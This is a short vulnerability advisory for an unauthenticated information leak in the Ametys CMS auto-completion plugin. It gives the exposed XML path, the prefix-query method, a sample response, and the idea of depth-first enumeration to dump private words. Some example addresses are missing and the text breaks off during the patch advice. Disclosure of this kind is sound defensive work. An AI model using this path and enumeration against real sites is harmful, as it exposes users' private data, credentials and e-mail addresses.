- Title : Ametys CMS - Unauthenticated information disclosure in the auto-completion plugin
- Author : @podalirius_
- CVSS : 5.3 (Medium)
- CVSS Vector :
The auto-completion plugin in Ametys CMS before 4.5.0 allows a remote unauthenticated attacker to read documents such as
plugins/web/service/search/auto-completion/domain/en.xml (and similar pathnames for other languages), which contain all characters typed by all users, including the content of private pages. For example, a private page may contain usernames, e-mail addresses, and possibly passwords.
The autocompletion plugin in Ametys CMS <= 4.5.0 exposes publicly an XML file containing a wordlist at the following address:
To perform a request on this database, an attacker just needs to type the start of the word in the
q (query) parameter:
And the auto-completion plugin returns the first 10 matching words starting with
adm (from the query) in an XML file:
<?xml version="1.0" encoding="UTF-8"?> <auto-completion> <item>administrateur</item> <item>administrateurs</item> <item>administratif</item> <item>administratifs</item> <item>administration</item> <item>administrations</item> <item>administrative</item> <item>administratives</item> <item>administres</item> <item>admission</item> </auto-completion>
With this in mind, an attacker just needs to perform a depth first search on the API to extract all the content of it.
In order to patch this vulnerability you need to update your Ametys CMS to the latest version (